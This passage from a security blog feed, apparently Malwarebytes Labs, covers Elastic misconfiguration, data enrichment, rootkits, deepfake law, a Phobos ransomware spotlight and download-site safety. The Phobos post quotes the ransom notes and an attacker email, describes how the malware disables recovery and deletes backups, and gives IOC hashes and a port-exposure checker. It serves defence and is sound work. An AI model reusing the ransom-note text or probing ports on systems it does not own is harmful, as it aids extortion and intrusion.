Elastic is likely the number one source of leaked data online, and after conducting this research, I would attribute that to how easy it is to misconfigure. The focus, of course, is on the relationship between the internal server on 9200 and the public-facing component on 5601.

The purpose of this article was not to talk about a specific company or to put anyone on blast for exposing private data. Rather, I am hoping to explain just how many servers are sitting on the Internet with this backdoor. There are thousands of elastic servers open to the public and exposing data—this is nothing new. What makes these specific cases unique is that there were clearly attempts to incorporate some type of security; however, the platform is being misunderstood.

Because elastic search is such a commonly used cloud database, this specific misconfiguration is worth highlighting, especially since it can easily be fixed.

Finding the exposed data was neither the result of a 1337 hack nor a difficult side channel to discover. Hopefully this helps admins using elastic better understand the danger of defaults, and provides security analysts with some useful information on researching new cloud infrastructures.

Stay tuned for the next article in this series where I will be covering the details of various leaks found on elastic.

The post Business in the front, party in the back: backdoors in elastic servers expose private data appeared first on Malwarebytes Labs.

Explained: data enrichment

How do your favorite brands know to use your first name in the subject line of their emails? Why do you seem to get discounts and special offers on products you’ve recently purchased? Businesses are able to personalize their marketing messages thanks to data enrichment.

Data enrichment refers to the process of enhancing, refining, and improving raw data. It is usually the last step in constructing a dataset for a marketing campaign, but it can serve several other goals as well.

Contact enrichment is the most common form of data enrichment. Contact enrichment is the process of adding additional information to existing contacts for more complete data.

Consider, for example, the scenario where a database contains names and addresses, but is missing telephone numbers that sales teams will need to reach out to prospective customers. One option is to apply contact enrichment that can match the data that the existing database contains with the telephone numbers listed in another database.

Definition of data enrichment, extended

Data enrichment is defined as merging third-party data from an external authoritative source with an existing database of first-party customer data. Some organizations do this to enhance the data they already possess so they can make more informed decisions.

More broadly, data enrichment refers to processes used to enhance, refine, or otherwise improve on raw data. In this context, it encompasses the whole strategy and process needed to improve existing databases. This idea and other related concepts are essential in making data a valuable asset for almost any modern enterprise.

Data enrichment processes

Even though data enrichment can be accomplished in several different ways, many of the tools used to refine data in a dataset focus on correcting errors or filling in incomplete data. A common data enrichment process would, for example, correct likely misspellings or typographical errors in a database by using precision algorithms designed for that purpose. And some data enrichment tools could also add information to simple data tables.

Another way in which data enrichment can work is by extrapolating data. Through methodologies such as fuzzy logic, engineers can produce extra information from a given raw data set. This and other similar projects can also be described as data enrichment activities.

Data enrichment can also include merging data tables into a new dataset by using corresponding fields. In layman’s terms: companies can buy access to other databases, look for additional information about their customers, and add that information to their own database.
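
As a toy illustration of that kind of merge, the snippet below enriches a first-party contact list with phone numbers from a second dataset, matched on the email field; all of the data is invented for the example.

// Merge two record sets on a shared key (email), keeping the first-party fields.
const contacts = [{ email: 'a@example.com', name: 'Ann' }];
const purchased = [{ email: 'a@example.com', phone: '+1-555-0100' }];

const byEmail = new Map(purchased.map((r) => [r.email, r]));
const enriched = contacts.map((c) => ({ ...c, ...(byEmail.get(c.email) ?? {}) }));
console.log(enriched); // [{ email: 'a@example.com', name: 'Ann', phone: '+1-555-0100' }]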

Privacy concerns

The merger or combination of data hardly ever happens after a subject has been asked for permission. This poses a privacy problem, as users typically have a reasonable idea about which information they have provided to a specific organization, but if organizations add information from other databases, this picture will be skewed. The organization will have information about them of which they are not aware.

As long as this is generally available information, the problem is minor. But consider the famous example of your insurance company getting hold of the data gathered through your supermarket’s loyalty card. What you buy and consume may be something you would rather keep from them.

There are some privacy regulations that limit data enrichment for this very reason. The General Data Protection Regulation (GDPR) is a regulation on data protection and privacy in the European Union (EU) and the European Economic Area (EEA). It also addresses the transfer of personal data outside the EU and EEA areas. GDPR allows customers to ask what information about them is held in an organization’s database and to have records, or parts of records, deleted.

Since GDPR also regulates the exchange and transfer of personal data, this can severely limit an organization’s choice of data enrichment providers. In GDPR terminology, any data provider you use is a “data processor.” In order to send any EU citizen’s data to a provider for any purpose, including enrichment, you must have a Data Processing Agreement (DPA) signed with that vendor.

A DPA is a legally binding contract that states the rights and obligations of each party concerning the protection of personal data. It is mandatory in order to establish a chain of responsibility for the use, and safety, of personal data.

Steps to successful data enrichment

There are a few things to be done before
you embark on a successful data enrichment process:

  • Sanitize your own data, or you will end up paying for data you will never use. Getting extra information about non-existing people, or adding to incomplete records is a waste.
  • Determine your goals and purpose for the data enrichment exercise. Again, avoid paying for data that turns out to be useless. Don’t pay for data tables just because they are available. If you are not going to use them, skip them.
  • Determine which processes the enriched data will support. Will the projected return outweigh the cost?
  • Determine your target market in terms of account profiles and personas. Do you want the data for a subset of customers that meet certain criteria, or would you, for example, like to exclude residents of GDPR-enforcing countries?

Sanitizing not only means removing duplicates, but also checking the validity of older data and the usefulness of entries that were filled out by customers or prospects themselves—on your website, for example.

Once you have determined your goals and decided which data are crucial to achieve these goals, then start looking for a data provider. Some may be more expensive but stronger in a certain data field. You can maximize your success by finding the data provider that best fits your needs.

Not all data enrichment makes you rich

Keep in mind that buying—and storing—the extra data will cost you. Data needs to be backed up and protected, and the storage costs can add up to a tidy sum depending on the size of the datasets. And if the data is not kept up to date, then it may soon become worthless.

Finally, if you’re ever breached, the amount and type of leaked data are determining factors for the ensuing loss of reputation.

The post Explained: data enrichment appeared first on Malwarebytes Labs.

How to prevent a rootkit attack

If you’re ever at the receiving end of a rootkit attack, then you’ll understand why they are considered one of the most dangerous cyberthreats today.

Rootkits are a type of malware designed to stay undetected on your computer. Cybercriminals use rootkits to remotely access and control your machine, burrowing deep into the system like a latched-on tick. Rootkits typically infect computers via phishing email, fooling users with a legitimate-looking email that actually contains malware, but sometimes they can be delivered through exploit kits.

This article provides an overview of the different types of rootkits and explains how you can prevent them from infecting your computer.

What is a rootkit?

Originally, a rootkit was a collection of tools that enabled administrative access to a computer or network. Today, rootkits are associated with a malicious type of software that provides root-level, privileged access to a computer while hiding its existence and actions. Hackers use rootkits to conceal themselves until they decide to execute their malicious payload.

In addition, rootkits can deactivate anti-malware and antivirus software, and badly damage user-mode applications. Attackers can also use rootkits to spy on user behavior, launch DDoS attacks, escalate privileges, and steal sensitive data.

Possible outcomes of a rootkit attack

Today, malware authors can easily purchase rootkits on the dark web and use them in their attacks. The list below explores some of the possible consequences of a rootkit attack.

Sensitive data stolen

Rootkits enable hackers to install additional malicious software that steals sensitive information, like credit card numbers, social security numbers, and user passwords, without being detected.

Malware infection

Attackers use rootkits to install malware on computers and systems without being detected. Rootkits conceal the malicious software from any existing anti-malware or antivirus tools, often deactivating security software without the user’s knowledge. With that protection disabled, rootkits enable attackers to execute harmful files on infected computers.

File removal

Rootkits grant access to all operating system files and commands. Attackers using rootkits can easily delete Linux or Windows directories, registry keys, and files.

Eavesdropping

Cybercriminals leverage rootkits to exploit unsecured networks and intercept personal user information and communications, such as emails and messages exchanged via chat.

Remote control 

Hackers use rootkits to remotely access and change system configurations. They can then open TCP ports in firewalls or alter system startup scripts.

Types of rootkit attacks

Attackers can install different rootkit types on any system. Below, you’ll find a review of the most common rootkit attacks.

Application rootkits

Application rootkits replace legitimate files with infected rootkit files on your computer. These rootkits infect standard programs like Microsoft Office, Notepad, or Paint. Attackers can get access to your computer every time you run those programs. Antivirus programs can easily detect them since they both operate on the application layer.

Kernel rootkits

Attackers use these rootkits to change the functionality of an operating system by inserting malicious code into it. This gives them the opportunity to easily steal personal information.

Bootloader rootkits

The bootloader mechanism is responsible for loading the operating system on a computer. These rootkits replace the original bootloader with an infected one. This means that bootloader rootkits are active even before the operating system is fully loaded.

Hardware and firmware rootkits

This kind of rootkit can get access to a computer’s BIOS system or hard drives as well as routers, memory chips, and network cards.

Virtualized rootkits

Virtualized rootkits take advantage of virtual machines in order to control operating systems. They were developed by security researchers in 2006 as a proof of concept.

These rootkits create a virtual machine before the operating system loads, and then simply take over control of your computer. Virtualized rootkits operate at a higher level than operating systems, which makes them almost undetectable.

How to prevent a rootkit attack

Rootkit attacks are dangerous and harmful, but they can only infect your computer if you somehow launch the malicious software that carries the rootkit. The tips below outline the basic steps you should follow to prevent rootkit infection.

Scan your systems

Scanners are software programs designed to analyze a system and get rid of active rootkits.

Rootkit scanners are usually effective in detecting and removing application rootkits. However, they are ineffective against kernel, bootloader, or firmware attacks. Kernel level scanners can only detect malicious code when the rootkit is inactive. This means that you have to stop all system processes and boot the computer in safe mode in order to effectively scan the system.

Security experts claim that a single scanner cannot guarantee the complete security of a system, due to these limitations. Therefore, many advise using multiple scanners and rootkit removers. To fully protect yourself against rootkit attacks at the boot or firmware level, you need to back up your data, then reinstall the entire system.

Avoid phishing attempts

Phishing is a type of social engineering attack in which hackers use email to deceive users into clicking on a malicious link or downloading an infected attachment.

The fraudulent email can be anything, from Nigerian prince scams asking to reclaim gold to fake messages from Facebook requesting that you update your login credentials. The infected attachments can be Excel or Word documents, a regular executable program, or an infected image.

Update your software

Many software programs contain vulnerabilities and bugs that allow cybercriminals to exploit them—especially older, legacy software. Usually, companies release regular updates to fix these bugs and vulnerabilities. But not all vulnerabilities are made public. And once software has reached a certain age, companies stop supporting it with updates.

Ongoing software updates are essential for staying safe and preventing hackers from infecting you with malware. Keep all programs and your operating system up-to-date, and you can avoid rootkit attacks that take advantage of vulnerabilities.

Use next-gen antivirus

Malware authors always try to stay one step ahead of the cybersecurity industry. To counter their progress, you should use antivirus programs that leverage modern security techniques, like machine learning-based anomaly detection and behavioral heuristics. This type of antivirus can determine the origin of the rootkit based on its behavior, detect the malware, and block it from infecting your system.

Monitor network traffic

Network traffic monitoring techniques analyze network packets in order to identify potentially malicious network traffic. Network analytics can also mitigate threats more quickly while isolating the network segments that are under attack to prevent the attack from spreading.

Rootkit prevention beats clean-up

Rootkits are among the most difficult types of malware to find and remove. Attackers frequently use them to remotely control your computer, eavesdrop on your network communication, or execute botnet attacks.

This is a nasty type of malware that can seriously affect your computer’s performance and lead to personal data theft. Since it’s difficult to detect a rootkit attack, prevention is often the best defense. Use the tips offered in this article as a starting point for your defense strategy. To ensure continual protection, continue learning. Attacks always change, and it’s important to keep up.

The post How to prevent a rootkit attack appeared first on Malwarebytes Labs.

Rules on deepfakes take hold in the US

For years, an annual, must-pass federal spending bill has served as a vehicle for minor or contentious provisions that might otherwise falter in standalone legislation, such as the prohibition of new service member uniforms, or the indefinite detainment of individuals without trial.

In 2019, that federal spending bill, called the National Defense Authorization Act (NDAA), once again included provisions separate from the predictable allocation of Department of Defense funds. This time, the NDAA included language on deepfakes, the machine-learning technology that, with some human effort, has created fraudulent videos of UK political opponents Boris Johnson and Jeremy Corbyn endorsing one another for Prime Minister.

Matthew F. Ferraro, a senior associate at the law firm
WilmerHale who advises clients on national security, cyber security, and crisis
management, called the deepfakes provisions a “first.”

“This is the first federal legislation on deepfakes in the history
of the world,” Ferraro said about the NDAA, which was signed by the President
into law on December 20, 2019.

But rather than creating new policies or crimes regarding deepfakes—like making it illegal to develop or distribute them—the NDAA asks for a better understanding of the burgeoning technology. It asks for reports and notifications to Congress.

Per the NDAA’s new rules, the US Director of National Intelligence must, within 180 days, submit a report to Congress that provides information on the potential national security threat that deepfakes pose, along with the capabilities of foreign governments to use deepfakes in US-targeted disinformation campaigns, and what countermeasures the US currently has or plans to develop.

Further, the Director of National
Intelligence must notify Congress each time a foreign government has launched, is
currently launching, or plans to launch a disinformation campaign using deepfakes or “machine-generated
text,” like that produced by online bots that impersonate humans.

Lee Tien, senior staff attorney for Electronic Frontier Foundation, said that, with any luck, the DNI report could help craft future, informed policy. Whether Congress will actually write any legislation based on the DNI report’s information, however, is a separate matter.

“You can lead a horse to water,” Tien said, “but you can’t necessarily make them drink.”

With the NDAA’s passage, Malwarebytes is starting a two-part blog on deepfake legislation in the United States. Next week we will explore several Congressional and stateside bills in further depth.

The National Defense Authorization Act

The National Defense Authorization Act of 2020 is a sprawling, 1,000-plus page bill that includes just two sections on deepfakes. The sections set up reports, notifications, and a deepfakes “prize” for research in the field.

According to the first section, the country’s Director of
National Intelligence must submit an unclassified report to Congress within 180
days that covers the “potential national security impacts of machine manipulated
media (commonly known as “deepfakes”); and the actual or potential use of
machine-manipulated media by foreign governments to spread disinformation or
engage in other malign activities.”

The report must include the following seven items:

  • An assessment of the technology capabilities of foreign governments concerning deepfakes and machine-generated text
  • An assessment of how foreign governments could use or are using deepfakes and machine-generated text to “harm the national security interests of the United States”
  • An updated identification of countermeasure technologies that are available, or could be made available, to the US
  • An updated identification of the offices inside the US government’s intelligence community that have, or should have, responsibility on deepfakes
  • A description of any research and development efforts carried out by the intelligence community
  • Recommendations about whether the intelligence community needs tools, including legal authorities and budget, to combat deepfakes and machine-generated text
  • Any additional info that the DNI finds appropriate

The report must be submitted in an unclassified format. However,
an annex to the report that specifically addresses the technological capabilities
of the People’s Republic of China and the Russian Federation may be classified.

The NDAA also requires that the DNI notify the Congressional
intelligence committees each time there is “credible information” that an
identifiable, foreign entity has used, will use, or is currently using deepfakes
or machine-generated text to influence a US election or domestic political
processes.

Finally, the NDAA also requires that the DNI set up what it
calls a “deepfakes prize competition,” in which a program will be established “to
award prizes competitively to stimulate the research, development, or
commercialization of technologies to automatically detect machine-manipulated
media.” The prize amount cannot exceed $5 million per year.

As the first, approved federal language on deepfakes, the NDAA is rather non-controversial, Tien said.

“Politically, there’s nothing particularly significant about
the fact that this is the first thing that we’ve seen the government enact in
any sort of way about [deepfakes and machine-generated text],” Tien said,
emphasizing that the NDAA has been used as a vehicle for other report-making
provisions for years. “It’s also not surprising that it’s just reports.”

But while the NDAA focuses only on research, other pieces of legislation—including some that have become laws in a couple of states—directly confront the assumed threat of deepfakes to both privacy and trust.

Pushing back against pornographic and political deception

Though today feared as a democracy destabilizer, deepfakes began
not with political subterfuge or international espionage, but with porn.

In 2017, a Reddit user named “deepfakes” began posting short clips of nonconsensual pornography that mapped the digital likenesses of famous actresses and celebrities onto the bodies of pornographic performers. This proved wildly popular.

In little time, a dedicated “subreddit”—a smaller, devoted forum—was created, and increasingly more deepfake pornography was developed and posted online. Two offshoot subreddits were created, too—one for deepfake “requests,” and another for fulfilling those requests. (Ugh.)

While the majority of deepfake videos feature famous actresses and
musicians, it is easy to imagine an abusive individual making and sharing a
deepfake of an ex-partner to harm and embarrass them.  

In 2018, Reddit banned the deepfake subreddits, but the creation of deepfake material surged, and in the same year, a new potential threat emerged.

Working with producers at Buzzfeed, comedian and writer Jordan Peele helped showcase the potential danger of deepfake technology when he lent his voice to a manipulated video of President Barack Obama.

“We’re entering an era in which our enemies can make anyone
say anything at any point in time, even if they would never say those things,” Peele
said, posing as President Obama.

This year, that warning gained some legitimacy when a video of Speaker of the House of Representatives Nancy Pelosi was slowed down to fool viewers into thinking that the California policymaker was either drunk or impaired. Though the video was not a deepfake because it did not rely on machine-learning technology, its impact was clear: It was viewed by more than 2 million people on Facebook and shared on Twitter by the US President’s personal lawyer, Rudy Giuliani.

These threats spurred lawmakers in several states to introduce legislation to prohibit anyone from developing or sharing deepfakes with the intent to harm or deceive.

On July 1, Virginia passed a law that makes the distribution of nonconsensual pornographic videos a Class 1 misdemeanor. On September 1, Texas passed a law to prohibit the making and sharing of deepfake videos with the intent to harm a political candidate running for office. In October, California Governor Gavin Newsom signed Assembly Bills 602 and 730, which, respectively, make it illegal to create and share nonconsensual deepfake pornography and to try to influence a political candidate’s run for office with a deepfake released within 60 days of an election.

Along the way, Congressional lawmakers in Washington, DC, have matched the efforts of their stateside counterparts, with one deepfake bill clearing the House of Representatives and another deepfake bill clearing the Senate.

The newfound interest from lawmakers is a good thing,
Ferraro said.

“People talk a lot about how legislatures are slow, and how
Congress is captured by interests, or it’s suffering ossification, but I look at
what’s going on with manipulated media, and I’m filled with some sense of hope
and satisfaction,” Ferraro said. “Both houses have reacted quickly, and I think
that should be a moment of pride.”  

But the new legislative proposals are not universally approved. Upon the initial passage of California’s AB 730, the American Civil Liberties Union urged Gov. Newsom to veto the bill.

“Despite the author’s good intentions, this bill will not solve
the problem of deceptive political videos; it will only result in voter
confusion, malicious litigation, and repression of free speech,” said Kevin
Baker, ACLU legislative director.

Another organization that opposes dramatic, quick regulation on deepfakes is EFF, which wrote earlier in the summer that “Congress should not rush to regulate deepfakes.”

Why then, does EFF’s Tien welcome the NDAA?

Because, he said, the NDAA does not introduce substantial policy
changes, but rather proposes a first step in creating informed policy in the
future.

“From an EFF standpoint, we do want to encourage folks to actually
synthesize the existing knowledge and to get to some sort of common ground on
which people can then make policy choices,” Tien said. “We hope the [DNI report]
will be mostly available to the public, because, if the DNI actually does what
they say they’re going to do, we will learn more about what folks outside the
US are doing [on deepfakes], and both inside the US, like efforts funded by the
Department of Defense or by the intelligence community.”

Tien continued: “To me, that’s all good.”

Wait and see

The Director of National Intelligence has until June to submit their report on deepfakes and machine-generated text. But until then, more states, such as New York and Massachusetts, may move forward with deepfake bills that were already introduced last year.

Further, as deepfakes continue to be shared online, more companies may have to grapple with how to treat them. Just last week, Facebook announced a new political deepfake policy that many argue does little to stop the wide array of disinformation posted on the platform.

Join us next week, when we take a deeper look at current federal and state deepfake legislation and at the tangential problem of fraudulent, low-tech videos now referred to as “cheapfakes.”

The post Rules on deepfakes take hold in the US appeared first on Malwarebytes Labs.

Threat spotlight: Phobos ransomware lives up to its name

Ransomware has taken dead aim at organizations since it became a mainstream tool in cybercriminals’ belts years ago. From massive WannaCry outbreaks in 2017 to industry-focused attacks by Ryuk in 2019, ransomware’s got its hooks in global businesses and shows no signs of stopping. That includes a malware family known as Phobos ransomware, named after the Greek god of fear.

Phobos is another one of those ransomware families that primarily targets organizations by employing tried-and-tested tactics to infiltrate systems. Sometimes called Phobos NextGen or Phobos NotDharma, this ransomware is widely considered an offshoot or variant—if not a rip-off—of the Dharma ransomware family, also known as CrySis, owing to Phobos’ operational and technical likeness to recent Dharma strains.

Phobos ransomware, like Sodinokibi, is sold in the underground in ransomware-as-a-service (RaaS) packages. This means that criminals with little to no technical know-how can create their own ransomware strain with the help of a kit, and organize a campaign against their desired targets.

However, Coveware researchers have noted that, compared to their peers, Phobos operators are “less organized and professional,” which has led to extended ransom negotiations and more complications for victims when retrieving their files and systems during the decryption process.

Phobos ransomware infection vectors

Phobos can arrive on systems in several ways: via open or insecure remote desktop protocol (RDP) connections on port 3389, brute-forced RDP credentials, stolen or purchased RDP credentials, and old-fashioned phishing. Phobos operators can also leverage malicious attachments, downloads, patch exploits, and software vulnerabilities to gain access to an organization’s endpoints and network.

Phobos ransomware primarily targets businesses; however, there have been several reports of consumers finding themselves face-to-face with this adversary, too.

Symptoms of Phobos ransomware infection

[Image: Phobos ransom note]

Systems affected by variants of the Phobos ransomware display the following symptoms:

Presence of ransom notes. Upon infection, Phobos drops two ransom notes in text (.TXT) and in executable web file (.HTA) format. The latter automatically opens after Phobos finishes encrypting files.

[Image: The HTA ransom note, which was noted to be a rebranded version of Dharma’s ransom note]

Here’s a snippet of the note:

All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail [email address 1]

Write this ID in the title of your message [generated ID]

If there is no response from our mail, you can install the Jabber client and write to us in support of [email address 2]

You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.

As you can see, Phobos operators require victims to contact them directly in the event of a ransomware infection.

In some notes from other variants, instructions to reach threat actors via Jabber are not included.

Aside from listing the channels victims can use to reach the threat actors, this ransom note also contains information on how to acquire Bitcoins and how to install the messenger client.

[Image: The TXT ransom note]
The TXT ransom note is notably shorter than its HTA counterpart, which means less tech-savvy victims would have to do their own research to understand unfamiliar terms. Note that while it contains the email addresses also found in the HTA file, it doesn’t contain the generated ID.

!!! All of your files are encrypted !!!

To decrypt them send e-mail, to this address: [email address 1]

If there is no response from our mail, you can install the Jabber client and write to us in support of [email address 2]

Although the HTA ransom note opens once Phobos has supposedly finished encrypting, we have observed that this aggressive ransomware continues to run in the background and encrypt any new files it is programmed to target. It can do this with or without an Internet connection.

Encrypted files with a long, appended string after the extension name. Phobos encrypts target files using AES-256 with RSA-1024 asymmetric encryption. Both Phobos and Dharma implement the same RSA algorithm; however, Phobos uses it from the Windows Crypto API while Dharma uses it from a third-party static library. Upon encryption, Phobos appends a compound extension to the end of each encrypted file, following this format:

.id[ID].[email address 1].[added extension]

In the formula, [ID] is the generated ID number specified in the ransom note. It is a two-part alpha-numeric string: the victim ID and the version ID, separated by a dash. [email address 1] is the email address victims are prescribed to use in reaching out to the threat actors. This is also specified in the ransom note. Lastly, [added extension] is an extension that Phobos threat actors decide to associate their ransomware with. Below are known extensions Phobos uses:

  • 1500dollars
  • actin
  • Acton
  • actor
  • Acuff
  • Acuna
  • acute
  • adage
  • Adair
  • Adame
  • banhu
  • banjo
  • Banks
  • Banta
  • Barak
  • bbc
  • blend
  • BORISHORSE
  • bqux
  • Caleb
  • Cales
  • Caley
  • calix
  • Calle
  • Calum
  • Calvo
  • CAPITAL
  • com
  • DDoS
  • deal
  • deuce
  • Dever
  • devil
  • Devoe
  • Devon
  • Devos
  • dewar
  • eight
  • eject
  • eking
  • Elbie
  • elbow
  • elder
  • Frendi
  • help
  • KARLOS
  • karma
  • mamba
  • phobos
  • phoenix
  • PLUT
  • WALLET
  • zax

For example, the new file name of sample.bmp after encryption is sample.bmp.id[23043C5D-2394].[agagekeys@qq.com].Caleb.
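
To make the naming formula concrete, here is a minimal Python sketch that pulls apart a Phobos-style file name using the format described above. The regular expression and the assumption that the ID parts are alphanumeric are ours, not something published by the attackers; the sample file name is the one from this article.

    import re

    # Pattern based on the naming formula described above:
    #   <original name>.id[<victim ID>-<version ID>].[<email address>].<added extension>
    PHOBOS_NAME = re.compile(
        r"^(?P<original>.+)"
        r"\.id\[(?P<victim_id>[0-9A-Za-z]+)-(?P<version_id>[0-9A-Za-z]+)\]"
        r"\.\[(?P<email>[^\]]+)\]"
        r"\.(?P<added_ext>[A-Za-z0-9]+)$"
    )

    def parse_phobos_name(filename):
        """Return the components of a Phobos-style file name, or None if it doesn't match."""
        match = PHOBOS_NAME.match(filename)
        return match.groupdict() if match else None

    if __name__ == "__main__":
        print(parse_phobos_name("sample.bmp.id[23043C5D-2394].[agagekeys@qq.com].Caleb"))
        # {'original': 'sample.bmp', 'victim_id': '23043C5D', 'version_id': '2394',
        #  'email': 'agagekeys@qq.com', 'added_ext': 'Caleb'}

A filter like this can help triage a folder of encrypted files, but it is only a heuristic; some Phobos variants may deviate from this exact pattern.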

Phobos encrypts files with the following extensions:

[Image: list of file extensions that Phobos targets for encryption]

However, it skips encoding the following OS files and files in the C:\Windows folder:

  • boot.ini
  • bootfont.bin
  • ntldr
  • ntdetect.com
  • io.sys

Phobos fully encrypts files of typical size. For large files, however, it takes a different approach and partially encrypts selected portions of the file. This severely cuts down the time needed to encrypt large files while still maximizing the damage done if something goes wrong during decryption.

This ransomware attacks files in all local drives as well as network shares.

Terminated processes. Phobos ransomware is known to terminate the following active processes on affected systems so that no running program can block its access to the files it intends to encrypt:

[Image: list of applications and processes terminated by Phobos]

Deleted shadow copies and local backups. Like Sodinokibi and other ransomware families, Phobos deletes shadow copies and backup copies of files to prevent users from restoring encrypted files, thus forcing them to do the threat actors’ bidding.

Systems not booting in recovery mode. Recovery mode is built into Windows systems. If a technical flaw causes the system to crash or become corrupted, users can restore the OS by reloading its last known good state. Phobos removes this option by preventing users from entering recovery mode.

Disabled firewall. With the firewall switched off, malware that would otherwise be blocked can make its way onto the affected system.

Protect your system from Phobos ransomware

Malwarebytes’ signature-less detection, coupled with real-time anti-malware and anti-ransomware technology, identifies and protects consumer and business users from Phobos ransomware in various stages of attack.

[Image: Malwarebytes detecting Phobos ransomware]

We recommend both consumers and IT administrators take the following actions to secure and mitigate against Phobos ransomware attacks:

  • Set your RDP server, which is built into the Windows OS, to deny public IPs access to TCP port 3389, the default port Windows Remote Desktop listens on. If you or your organization has no need for RDP, it is better to disable the service altogether. Critical systems or systems with sensitive information should not have RDP enabled.
  • Along with RDP port blocking, we also suggest blocking TCP port 445, the default port Server Message Block (SMB) uses to communicate in a Windows-based LAN, at the network perimeter. Note that you or your organization may have to do in-depth testing to see how your systems and/or programs are affected by this block. As a rule of thumb, block all unused ports. (A quick way to spot-check whether these ports answer from the outside is sketched after this list.)
  • Allow RDP access only to IPs that are under your or your organization’s control.
  • Enable the logging of RDP access attempts and review them regularly to detect instances of potential intrusion.
  • Enforce the use of strong passwords and account lockout policies for Active Directory domains and local Windows accounts.
  • Enforce multi-factor authentication (MFA) for RDP and local account logons whenever possible.
  • Enforce the use of a virtual private network (VPN) if your organization allows employees to work remotely.
  • Come up with and implement a sound backup strategy.
  • Maintain an inventory of running services and applications on your system, and review it regularly. For critical systems, it’s best to have an active monitoring and alerting scheme in place.
  • Have a disaster recovery scheme in place in case a successful breach via RDP happens.
  • Keep all your software, including OS and anti-malware, up-to-date.
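
As a quick spot-check for the first two recommendations above, the following Python sketch tests whether TCP ports 3389 (RDP) and 445 (SMB) accept connections from wherever you run it. The host address is a placeholder; run the check from outside your network to gauge public exposure, and treat it as a rough sanity check rather than a full port audit.

    import socket

    # Ports discussed above: 3389 (RDP) and 445 (SMB)
    PORTS_TO_CHECK = {3389: "RDP", 445: "SMB"}

    def is_port_open(host, port, timeout=3.0):
        """Return True if a TCP connection to host:port succeeds within the timeout."""
        try:
            with socket.create_connection((host, port), timeout=timeout):
                return True
        except OSError:
            return False

    if __name__ == "__main__":
        host = "203.0.113.10"  # placeholder: your server's public IP address
        for port, service in PORTS_TO_CHECK.items():
            status = "OPEN (exposed)" if is_port_open(host, port) else "closed or filtered"
            print(f"{service} (TCP {port}) on {host}: {status}")

If either port reports as open from an outside connection, treat that as a prompt to revisit the firewall and RDP settings above.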

On a final note, if you have all your personal or organizational resources properly locked down and secured, and you or your organization adheres to good cyber hygiene practices, there is little to fear from Phobos or ransomware in general.

Indicators of Compromise (IOCs)

  • e59ffeaf7acb0c326e452fa30bb71a36
  • eb5d46bf72a013bfc7c018169eb1739b
  • fa4c9359487bbda57e0df32a40f14bcd

Have a threat-free 2020, everyone!

The post Threat spotlight: Phobos ransomware lives up to its name appeared first on Malwarebytes Labs.

A week in security (January 6 – 12)

Last week on Malwarebytes Labs, we told readers how to check the safety of websites and their related files, explored the shady behavior taking place within the billion-dollar search industry, broke down the top six ways that hackers target retail businesses, and put a spotlight on the ransomware family Phobos.

We also broke a major new story when we discovered that a government-subsidized mobile phone is being shipped with pre-installed, unremovable malware.  

Other cybersecurity news

Stay safe, everyone!

The post A week in security (January 6 – 12) appeared first on Malwarebytes Labs.

Dubious downloads: How to check if a website and its files are malicious

A significant number of malware infections and potentially unwanted program (PUP) irritants are the result of downloads from unreliable sources. A multitude of websites specialize in distributing malicious payloads by offering them up as something legitimate or by bundling the desired installer with additional programs.

In November 2019, we learned that Intel removed old drivers, BIOS updates, and other legacy software from their site. While this software relates to products released in the last century and early years of the 2000s, many users still rely on old Intel products and have been left scrambling for specific downloads.

Users that follow older links to certain drivers and updates will find this instead:

[Image: Intel’s notice that the requested download has been removed]

Following the links to search the site or the download center only leads users around in circles—those downloads are gone. While some might argue that it is Intel’s right to remove drivers and updates after a decade, others understand that whenever legacy software is abandoned, a security nightmare ensues.

When users can no longer download files from official sources, desperate people will roam the Internet for a place where they can find the file they need. And what they usually find instead are malicious websites and downloads.

Malvertising using popular downloads

Habitually, threat actors find out which search terms are gaining in popularity as users seek out terminated software downloads, and they try to lure those searchers to their site. They will use SEO techniques to rank high in the search results or may even spend some dollars to show up in the sponsored results for certain keywords. They can hide their malware in malvertising in the form of downloads or even drive-by downloads, in which users need only visit the site, without downloading a single file, to be infected.

After all, a victim desperately looking for a file they need to get a system up and running again is really all a malware peddler could wish for. All the attacker has to do is make visitors believe they have found the file they are looking for. Once convinced, they will download and install the alleged driver all by themselves.

All the threat actor has to do is upload the malware under some convincing filename and attract visitors to the site. This is basically the same modus operandi that you will find in use when people go looking for cracks and keygens.

So, what can users do to avoid falling victim to such a scam? A couple of things, as it happens. We will provide you with some checks you can do before you visit the download site. And there are some checks you can perform before you run the downloaded file, too.

Checks you can perform to assess the website

When you have found a site that offers a file for download, there are a few actions you can take to check whether the site is trustworthy. They are:

  • Check for the green padlock
  • Read third-party reviews of the website
  • Use a trusted antivirus or browser extension, such as Browser Guard

Checking for the presence of the green padlock is a good start to ensure a site has purchased a security certificate, but it’s also not a guarantee that the website is safe. SSL certificates are cheap, and your neighborhood cybercriminal knows where to get them practically for free. If you click on the green padlock, you can find out who issued the certificate and for which site.
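
If you prefer the command line, clicking the padlock can be approximated with a short Python sketch that fetches the certificate a site presents and prints its subject, issuer, and expiry date. The domain is a placeholder; note that Python’s default SSL context also verifies the certificate chain, so an untrusted or expired certificate will raise an error instead of returning details.

    import socket
    import ssl

    def certificate_summary(hostname, port=443):
        """Fetch the TLS certificate a site presents and return its subject, issuer, and expiry."""
        context = ssl.create_default_context()  # also validates the certificate chain
        with socket.create_connection((hostname, port), timeout=5) as sock:
            with context.wrap_socket(sock, server_hostname=hostname) as tls:
                cert = tls.getpeercert()
        return {
            "subject": dict(item for field in cert["subject"] for item in field),
            "issuer": dict(item for field in cert["issuer"] for item in field),
            "valid_until": cert["notAfter"],
        }

    if __name__ == "__main__":
        print(certificate_summary("example.com"))  # placeholder domain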


Recommended reading: Explained: security certificates


There are many websites that offer reviews of download sites and domains, and while many of these sites are reputable, they tend to fall a little bit behind in adding Internet newcomers. Our cybercriminal can afford to dump a domain like a hot potato once it has racked up too many bad reviews, then purchase a new site from which to run his scheme.

In short, you can trust reviews about sites that have been around for a while, but the lack of reviews for a site could mean it only recently launched, or it may be up to no good.

Some cybercriminals are brilliant programmers. Most are not. But all the successful ones have one skill in common: They are well-versed in tricking people. So, don’t accept a website as trustworthy just because it features logos of other trustworthy companies on its pages. Logo images are easily found in online searches, and they could be planted on the site for exactly that reason: to gain the visitors’ trust. Logos could also be stolen, unauthorized, or handed out for different reasons than you might expect.

Some browsers and some free applications warn you about shady sites—especially sites they know to be the home of malware and scammers. Malwarebytes Browser Guard, for example, can be installed on Chrome and Firefox, adding to the browsers’ own capabilities to recognize malicious domains and sites.

